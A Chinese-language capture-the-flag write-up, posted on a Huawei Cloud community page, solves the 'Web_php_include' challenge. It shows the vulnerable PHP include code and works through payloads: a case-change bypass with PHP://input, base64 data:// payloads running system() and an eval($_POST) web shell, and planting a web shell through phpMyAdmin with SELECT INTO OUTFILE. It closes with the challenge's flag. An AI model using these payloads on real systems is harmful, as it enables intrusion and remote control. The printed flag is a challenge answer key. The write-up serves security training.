【愚公系列】2021年12月 攻防世界-进阶题-WEB-004(Web_php_include)

举报
愚公搬代码 发表于 2021/12/26 20:45:42 2021/12/26
【摘要】 一、Web_php_include题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1 二、使用步骤 1.点击获取在线场景 2.查看页面打开页面得到如下代码<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page...

一、Web_php_include

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

在这里插入图片描述

2.查看页面

打开页面得到如下代码

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

分析代码可知程序过滤掉了page=参数传入php://

3.大小写绕过

大小写绕过由于strstr()这个函数是区分大小写的所以我们可以转换成大小写用PHP://input

Post传输恶意代码

在这里插入图片描述

植入木马进行控制

4.data://伪协议执行命令利用

<?php system("cat fl4gisisish3r3.php")?> base64编码后使用
http://111.200.241.244:62364/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

查看源码得到flag
在这里插入图片描述

4.中国蚁剑

<?php eval($_POST[xiaohua]); ?> base64加密后拼接
http://111.200.241.244:62364/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==

蚁剑连接就好

5.数据库写入马

御剑扫描获得phpmyadmin root 密码空 进入

数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写

SHOW VARIABLES LIKE "secure_file_priv"

linux默认tmp是可写目录 试试写入一句话马 菜刀连接

SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'

flag为:ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}


总结

  • 伪协议
  • 菜刀,蚁剑
  • 数据库写入马
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。